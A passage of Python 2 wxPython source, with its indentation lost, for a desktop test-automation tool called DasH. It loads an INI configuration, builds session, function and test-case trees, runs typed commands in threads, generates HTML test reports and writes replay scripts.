#wx.Frame.__init__(self, None, title="DasH")
gui_event_decorator.__init__(self)
self.timestamp= datetime.now().isoformat('-').replace(':','-')
self.case_list= []
self.case_queue = Queue.Queue()
self.dict_test_report={}
self.check_case_running_status_lock = threading.Lock()
self.tabs_in_edit_area=[]
self.sessions_alive={}
MainFrame.__init__(self, parent=parent)
self.sequence_queue= Queue.Queue()
#self.sequence_queue.put()
self.ini_setting = ConfigParser.ConfigParser()
if os.path.exists(ini_file):
self.ini_setting.read(ini_file)
self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
self.mail_server = self.ini_setting.get('dash', 'mail_server')
self.mail_from =self.ini_setting.get('dash', 'mail_from')
self.mail_to_list =self.ini_setting.get('dash', 'mail_to_list')
self.mail_read_url =self.ini_setting.get('dash', 'mail_read_url')
self.mail_user = self.ini_setting.get('dash','mail_user')
self.mail_password =self.ini_setting.get('dash', 'mail_password')
self.web_port =int(self.ini_setting.get('dash', 'web_port'))
else:
with open(ini_file, 'w') as tmp_ini_file:
tmp_ini_file.write('''[dash]
test_suite_path = ../test_suite/
log_path= {log_path}
lib_path = {lib_path}
session_path={session_path}
#the source python file folder
src_path = {src_path}
mail_server={mail_server}
mail_to_list={mail_to_list}
mail_user={mail_user}
mail_from ={mail_from}
mail_read_url={mail_read_url}
mail_password = {mail_password}
web_port={web_port}
'''.format(
log_path = self.log_path,
lib_path = self.lib_path,
session_path = self.session_path,
src_path = self.src_path,
mail_server = self.mail_server,
mail_to_list = self.mail_to_list,
mail_user = self.mail_user,
mail_from = self.mail_from,
mail_read_url = self.mail_read_url,
mail_password = self.mail_password,
web_port = self.web_port))
tmp_ini_file.flush()
#self.ini_setting.read(ini_file)
self.ini_file = ini_file
from lib.common import create_case_folder, create_dir
sys.argv.append('-l')
sys.argv.append('{}'.format(self.log_path))
from lib.common import create_dir
self.log_path = create_dir(self.log_path)
self.suite_path = create_dir(self.suite_path)
self.lib_path = create_dir(self.lib_path)
self.src_path = create_dir(self.src_path)
if not os.path.exists(self.log_path):
os.mkdir(self.log_path)
self.add_src_path_to_python_path(self.src_path)
self.redir = RedirectText(self.m_log, self.log_path)
sys.stdout = self.redir
sys.stderr = self.redir
self.m_log.SetBackgroundColour('Black')
self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
#self.m_editor.WriteText('welcome to dash world')
self.m_log.WriteText('Welcome to DasH!\n')
self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
fileMenu = wx.Menu()
#open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
#open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
generate_test_report = fileMenu.Append(wx.NewId(), "Generate Test Report", "Generate Test Report")
generate_code = fileMenu.Append(wx.NewId(), "Generate Python Code", "Generate Python Code")
mail_test_report = fileMenu.Append(wx.NewId(), "Mail Test Report", "Mail Test Report")
get_case_queue = fileMenu.Append(wx.NewId(), "Get Case Queue", "Get Case Queue") #done
clear_case_queue = fileMenu.Append(wx.NewId(), "Clear Case Queue", "Clear Case Queue")
kill_running_case = fileMenu.Append(wx.NewId(), "Kill Running Case(s)", "Kill Running Case(s)")
self.m_menubar_main.Append(fileMenu, "&Operations")
self.Bind(wx.EVT_MENU,self.on_generate_test_report ,generate_test_report)
self.Bind(wx.EVT_MENU,self.on_generate_code ,generate_code)
self.Bind(wx.EVT_MENU,self.on_mail_test_report ,mail_test_report)
self.Bind(wx.EVT_MENU,self.get_case_queue ,get_case_queue)
self.Bind(wx.EVT_MENU,self.on_clear_case_queue ,clear_case_queue)
self.Bind(wx.EVT_MENU,self.on_kill_running_case ,kill_running_case)
self.Bind(wx.EVT_CLOSE, self.on_close)
self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
from wx.aui import AuiNotebook
bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.navigator.AddPage(self.session_page, 'SESSION')
self.navigator.AddPage(self.function_page, 'FUNCTION')
self.navigator.AddPage(self.case_suite_page, 'CASE')
self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
if False:
new_page = FileEditor(self.edit_area, 'a', type= type)
self.edit_area.AddPage(new_page, 'test')
self.tabs_in_edit_area.append(('test'))
self.edit_area.Enable(True)
right_sizer = wx.BoxSizer(wx.VERTICAL)
#right_sizer =wx.GridSizer( 3, 1, 0, 0 )
left_sizer = wx.BoxSizer(wx.HORIZONTAL)
left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
#self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
self.session_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_session_tab)
self.edit_area.Bind(wx.aui.EVT__AUINOTEBOOK_TAB_RIGHT_DOWN, self.on_right_up_over_tab_in_edit_area)
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer = wx.GridSizer( 1, 2, 0, 0 )
nav_sizer = wx.BoxSizer()
nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
self.m_left_navigator.SetSizer(nav_sizer)
#main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer.Add(left_sizer, 3, wx.EXPAND)
main_sizer.Add(left_sizer, 2, wx.EXPAND)
edit_sizer = wx.BoxSizer()
edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
self.m_file_editor.SetSizer(edit_sizer)
right_sizer.Add(self.m_file_editor, 8, wx.ALL|wx.EXPAND, 1)
right_sizer.Add(self.m_log, 2, wx.ALL|wx.EXPAND, 2)
right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
main_sizer.Add(right_sizer, 8, wx.EXPAND)
self.SetSizer(main_sizer)
ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
#th= threading.Thread(target=self.polling_running_cases)
#th.start()
#th = threading.Thread(target=self.polling_request_via_mail)
#th.start()
threading.Thread(target=self.web_server_start).start()
#tooltips bind
self.case_suite_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.session_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.function_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#wx.html.EVT_HTML_LINK_CLICKED wx.EVT_TEXT_URL, wx.EVT_TEXT_URL,
self.m_log.Bind(wx.EVT_TEXT_URL, self.on_leftD_click_url_in_m_log)
self.Bind(wx.EVT_IDLE, self.on_idle)
self.last_time_call_on_idle = datetime.now()
self.build_session_tab()
self.build_suite_tree()
self.build_function_tab()
self.Show(True)
self.Maximize()
def on_close(self, event):
try:
self.alive =False
sys.stderr =self.redir.old_stderr
sys.stdout = self.redir.old_stdout
self.redir.close()
event.Skip()
except Exception as e:
error(traceback.format_exc())
self.Show(False)
time.sleep(0.01)
def close():
try:
self.web_daemon.shutdown()
except:
pass
self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
if len(self.dict_test_report):
self.mail_test_report("DASH TEST REPORT")
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
closing_page = self.edit_area.GetPage(index)
if isinstance(closing_page, (SessionTab)):
if closing_page:
name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
try:
closing_page.on_close()
except:
pass
close()
time.sleep(0.01)
#sys.exit(0)
def generate_report(self, filename, report_all_cases=True):
#fixed 2017-11-19, 2017-10-21 no need to send whole report, just the updating part
def GetTime(duration):
from datetime import timedelta
sec = timedelta(seconds=int(duration))
d = datetime(1,1,1) + sec
#print("DAYS:HOURS:MIN:SEC")
return "%d:%d:%d:%d" % (d.day-1, d.hour, d.minute, d.second)
report_in_list =[['result',
'start_time',
'end_time',
'ProcessID',
'duration',
'duration',
'case_name','log']]
report = '''Test Report
RESULT,\tStart_Time,\tEnd_Time,\tPID,\tDuration(s),\tDuration(D:H:M:S)\tCase_Name,\tLog\n'''
with open(filename, 'w') as f:
if len(self.dict_test_report):
#f.write(report)
for pi in sorted(self.dict_test_report, key = lambda x: self.dict_test_report[x][1]):
case_name, start_time, end_time, duration, return_code ,proc, log_path =self.dict_test_report[pi][:7]
if return_code is None:
result = 'IP'
result_html = '<font color="blue">IP'
else:
result = return_code # 'FAIL' if return_code else 'PASS'
if result.lower() in ['pass']:
result_html= '<font color="green">PASS'
else:
result_html= '<font color="red">FAIL'
one_record = ['{}'.format(x) for x in [
result,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'{html_link} {file_path}'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
one_record_html = ['{}'.format(x) for x in [
result_html,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'<a href={html_link}>{file_path}</a>'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
report_in_list.append(one_record_html)
record = '\t'.join(one_record)
if result == 'IP':
report+=record+'\n'
else:
if report_all_cases:
report+=record+'\n'
self.mailed_case_pids.append(pi)
elif pi not in self.mailed_case_pids:
report+=record+'\n'
self.mailed_case_pids.append(pi)
else:
pass
from lib.common import array2htmltable
report_in_html_string = array2htmltable(report_in_list)
f.write(report_in_html_string)
return report
def on_close_tab_in_edit_area(self, event):
#self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
def close_tab():
global gSessions
closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
closing_page.on_close()
if isinstance(closing_page, (SessionTab)):
ses_name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
if gSessions.has_key( ses_name):
# globals().has_key(ses_name):
#g = dict(globals())
#globals()[ses_name]=None
#del g[ses_name]
gSessions[ses_name].close_session()
del gSessions[ses_name] #del globals()[ses_name]
threading.Thread(target=close_tab, args=[]).start()
event.Skip()
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
self.case_list.append(path_name)
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
@gui_event_decorator.gui_even_handle
def build_suite_tree(self):
suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
if not os.path.exists(suite_path):
suite_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(suite_path)
root =self.case_suite_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':suite_path})
self.case_suite_page.SetItemData(root, item_info)
self.add_item_to_subfolder_in_tree(root)
self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self,event):
ht_item =self.case_suite_page.GetSelection()
try:
item_info = self.case_suite_page.GetPyData(ht_item)
if 0== self.case_suite_page.GetChildrenCount(ht_item):
if os.path.isdir(item_info['path_name']):
self.add_item_to_subfolder_in_tree(ht_item)
except Exception as e:
pass
@gui_event_decorator.gui_even_handle
def build_session_tab(self):
if self.session_page.RootItem:
self.session_pagef.DeleteAllItems()
self.ini_setting.read(self.ini_file)
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
error(traceback.format_exc())
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
#@gui_event_decorator.gui_even_handle
def on_LeftDClick_in_Session_tab(self, event):
ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
self.session_page.GetItemText(self.session_page.GetSelection())
session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
if session_attribute.Data.has_key('attribute'):
info(session_attribute.Data['attribute'])
counter =1
original_ses_name = ses_name
tmp_tabs =[]
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
tab_page = self.edit_area.GetPage(index)
#tab_page.name
tmp_tabs.append(tab_page.name)
self.tabs_in_edit_area = tmp_tabs
while ses_name in self.tabs_in_edit_area:
ses_name= '{}_{}'.format(original_ses_name,counter)
counter+=1
if globals().has_key(ses_name):
if not globals().has_key('_{}'.format(ses_name)):
info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
ses_name='_{}'.format(ses_name)
self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
else:
error(("variable '{}' is existed in global, please change the name".format(ses_name)))
return
new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path+'/session_log')
window_id = self.edit_area.AddPage(new_page, ses_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
self.tabs_in_edit_area.append(ses_name)
self.sessions_alive.update({ses_name: new_page.name})
attribute = session_attribute.Data['attribute']
log_path='a_fake_log_path_for_auto_script'
attribute['log_path']=log_path
self.add_new_session_to_globals(new_page, '{}'.format(attribute))
#globals().update({ses_name: new_page.session})
time.sleep(0.1)
event.Skip()
def add_new_session_to_globals(self, new_page, args_str):
name = new_page.name
global DUT
#FIX ISSUE
# INFO common.py:161 call_function_in_module:
# module_name: xdsl
# class_name: xdsl
# function_name: get_eut
# args:[wxPython wrapper for DELETED SessionTab object! (The C++ object no longer exists.)]
# kwargs: {}
# Exception in thread Thread-40:
# Traceback (most recent call last):
# File "C:\Python27\Lib\threading.py", line 801, in __bootstrap_inner
# self.run()
# File "C:\Python27\Lib\threading.py", line 754, in run
# self.__target(*self.__args, **self.__kwargs)
# File "C:\workspace\gDasH\src\xdsl.py", line 36, in get_eut
# ses.write(cmd)
# File "C:\Python27\lib\site-packages\wx-3.0-msw\wx\_core.py", line 16711, in __getattr__
# raise PyDeadObjectError(self.attrStr % self._name)
if name in DUT:
try:
DUT[name].name
del DUT[name]
except :
DUT[name]= new_page
else:
DUT[name]= new_page
self.add_cmd_to_sequence_queue('DUT["{}"] = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
#session = dut(name, **attributes)
@gui_event_decorator.gui_even_handle
def on_command_enter(self, event):
info('called on_command_enter')
cmd = self.m_command_box.GetValue()
self.m_command_box.Clear()
cmd = cmd.strip()
cmds = cmd.replace('\r\n', '\n').split('\n')
def handle_one_cmd(cmd):
if cmd.strip()=='':
return
cmd_string = cmd.strip()
lex = shlex.shlex(cmd_string)
lex.quotes = '"'
lex.whitespace_split = True
cmd_list=list(lex)
function_obj_name = cmd_list[0]
if self.dict_function_obj.has_key(function_obj_name):
call_function = self.dict_function_obj[function_obj_name]
else:
return
module,class_name, function,args = parse_command_line(cmd)
self.add_cmd_to_history(cmd, module, None, class_name)
#args[0]=self.sessions_alive['test_ssh'].session
if module !='' or class_name!='' or function!='':
after_sub_args=[]
for i in range(len(args)):
a = args[i]
if a in globals():
after_sub_args.append(a)
elif a in DUT:
after_sub_args.append('DUT["{}"]'.format(a))
else:
after_sub_args.append(a)
function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,after_sub_args, globals())
#call_function = None
# if class_name!="":
#
# call_function = getattr(instance_name, function_name)
# #(*new_argvs,**new_kwargs)
# else:
# call_function = instance_name#(*new_argvs,**new_kwargs)
th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
th.start()
#self.m_command_box.ShowPosition(len(self.m_command_box.GetString())+1)
self.add_cmd_to_history(cmd, module, str_code, class_name)
else:
error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
for cmd in cmds:
try:
handle_one_cmd(cmd)
except:
error(traceback.format_exc())
event.Skip()
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
def on_key_down(self, event):
#error(event.KeyCode)
keycode = event.KeyCode
if keycode ==wx.WXK_TAB:
self.m_command_box.AppendText('\t')
self.on_command_enter(event)
elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
self.m_command_box.AppendText('?')
self.on_command_enter(event)
else:
event.Skip()
def on_key_up(self, event):
keycode = event.KeyCode
increase =False
if keycode ==wx.WXK_UP:
pass
elif keycode ==wx.WXK_DOWN:
increase =True#
if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
self.m_command_box.Clear()
self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
self.m_command_box.AppendText(new_command)
if keycode in [wx.WXK_TAB]:
pass
else:
event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code, class_name=""):
if str_code is None:
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
else:# str_code is not None:
self.add_cmd_to_sequence_queue(str_code,module_name, class_name )
#self.sequence_queue.put([cmd, datetime.now()])
def get_description_of_function(self, function_obj):
import inspect
fundefstr=''
try:
try:
fundef = inspect.getsource(function_obj) # recreate function define for binary distribute
fundefstr = fundef[:fundef.find(':')]
except Exception as e:
(args, varargs, keywords, defaults) =inspect.getargspec(function_obj)
argstring = ''
largs=len(args)
ldefaults= len(defaults)
gaplen = largs-ldefaults
index =0
for arg in args:
if index <gaplen:
argstring+='%s, '%arg
else:
defvalue = defaults[index-gaplen]
if type('')==type(defvalue):
defvalue = '"%s"'%defvalue
argstring+='%s = %s, '%(arg,str(defvalue))
index+=1
fundefstr ='%s( %s )'%(function_obj.func_name, argstring)
fundef =fundefstr
listoffun =fundef.split('\n')
ret = function_obj.__doc__
if ret:
fundefstr = fundefstr +'\n '+'\n '.join(ret.split('\n'))
except Exception as e:
pass
return fundefstr
@gui_event_decorator.gui_even_handle
def check_whether_function_file_is_updated(self):
for module_file in self.dict_function_files.keys():
old_modify_time = self.dict_function_files[module_file]
current_modify_time = os.path.getmtime(module_file)
if current_modify_time ==old_modify_time:
continue
else:
self.build_function_tab()
@gui_event_decorator.gui_even_handle
def build_function_tab(self):
try:
instances = self.dict_function_obj['instance'].keys()
for inst_name in instances:
inst = self.dict_function_obj['instance'][inst_name]
print ('instance ref count',inst_name, sys.getrefcount(inst))
if 'close' in dir(inst):
inst.close()
del inst
fun_list = self.dict_function_obj.keys()
for fun_name in fun_list:
inst = self.dict_function_obj[fun_name]
print ('instance ref count',fun_name, sys.getrefcount(inst))
del inst
time.sleep(1)
#import gc
#gc.collect()
self.dict_function_obj={'instance':{}}
self.dict_function_files= {}
src_path = os.path.abspath(self.src_path)
if not os.path.exists(src_path):
src_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(src_path)
root =self.function_page.AddRoot(base_name)
item_info = wx.TreeItemData({'name':src_path})
self.function_page.SetItemData(root, item_info)
modules = get_folder_item(src_path)
if modules is None:
self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
return
for module_file in modules:
if module_file.endswith('.pyc'):
if module_file[:-1] in modules:
continue
if module_file.startswith('__'):
continue
path_name = '{}'.format(os.path.abspath(self.src_path))
module_name = os.path.basename(module_file).split('.')[0]
extension = os.path.basename(module_file).split('.')[-1]
full_name = '{}/{}'.format(path_name,module_file)
if extension.lower() in ['py', 'pyc']:
try:
new_module = self.function_page.InsertItem(root, root, module_name)
module_file, path_name, description = imp.find_module(module_name)
lmod = imp.load_module(module_name, module_file, path_name,description)
self.dict_function_files[full_name] = os.path.getmtime(full_name)
for attr in sorted(dir(lmod)):
if attr.startswith('__'):
continue
attr_obj = getattr(lmod, attr)
attr_type = type(attr_obj)
if attr_type == types.FunctionType :
new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
fun_str = '{}.{}'.format(module_name,attr)
item_info = wx.TreeItemData({'name':fun_str,
'tip':self.get_description_of_function(attr_obj),
})
self.dict_function_obj[fun_str] = attr_obj
self.function_page.SetItemData(new_item, item_info)
elif attr_type== types.TypeType:
#class_obj = getattr(lmod, attr)
instance = getattr(lmod, attr)()
self.dict_function_obj['instance'][attr]=instance
new_class = self.function_page.InsertItem(new_module, new_module, attr)
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_class, item_info)
for attr_in_class in sorted(dir(instance)):
if attr_in_class.startswith('__'):
continue
attr_obj = getattr(instance,attr_in_class)
attr_type =type(attr_obj)
if attr_type == types.MethodType :
fun_str = '{}.{}.{}'.format(module_name,attr,attr_in_class)
item_info = wx.TreeItemData({'name':fun_str,
'tip':self.get_description_of_function(attr_obj)})
new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
self.dict_function_obj[fun_str] = getattr(instance, attr_in_class)#attr_obj
self.function_page.SetItemData(new_item, item_info)
except :
pass
self.function_page.Expand(root)
first_child = self.function_page.GetFirstChild(root)
self.function_page.Expand(first_child[0])
except Exception as e:
print(traceback.format_exc())
def on_LeftDClick_in_Function_tab(self,event):
event.Skip()
select_item = self.function_page.GetSelection()
fun_name = self.function_page.GetItemData(select_item)
text_in_tree = self.function_page.GetItemText(select_item)
if fun_name != None and fun_name.Data.has_key('name'):
cmd = fun_name.Data['name']
info('click item in Functions tab: {}'.format(fun_name.Data['name']))
wx.CallAfter(self.m_command_box.Clear)
wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
wx.CallAfter(self.m_command_box.SetFocus)
wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
wx.CallAfter(self.m_command_box.Refresh)
def on_refresh_case_page(self, event):
self.case_suite_page.DeleteAllItems()
self.build_suite_tree()
info('Refresh Case tab done!')
def on_right_down_in_session_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_session_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_session_page(self, event):
self.session_page.DeleteAllItems()
self.build_session_tab()
info('Refresh Session tab done!')
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name, class_name=""):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:class_name})
self.sequence_queue.put([cmd,datetime.now() ])
def generate_code(self, file_name ):
#todo 2017-10-21 no code need, when no command entered at all
str_code ="""#created by DasH {}
if __name__ == "__main__":
import sys, traceback
sys.path.insert(0,r'{}')
sys.path.insert(0,r'{}')
import common
log_path= '../log/tmp'
log_path= common.create_case_folder()
DUT={}
try:
""".format(datetime.now().isoformat('-'), self.src_path,self.lib_path , "{}")
sessions =[]
for module in self.import_modules:
str_code+=' import {mod}\n'.format(mod=module)#\n {mod}_instance = {mod}()
for module in self.import_modules:
class_name = self.import_modules[module]
if class_name!="":
str_code+=' {mod}_instance = {mod}.{class_name}()\n'.format(mod=module, class_name=class_name)#\
no_operation = True
while True:
try:
cmd, timestamp =self.sequence_queue.get(block=False)[:2]
str_code +=' {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
if cmd.find('dut.dut(')!=-1:
sessions.append(cmd.split('=')[0].strip())
no_operation=False
#datetime.now().isoformat()
except Exception as e:
break
close_session=''
str_code+=''' except Exception as e:
print(traceback.format_exc())\n'''
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
no_operation=False
str_code+=' sys.exit(-1)\n'#, sys.exit(-1)
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
info('code saved to file: ',file_name)
info(str_code)
info('code saved to file: ',file_name)
if not no_operation:
with open(file_name, 'a+') as f:
f.write(str_code)
else:
info('No code will be saved to file, due to no operation was performed ',file_name)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
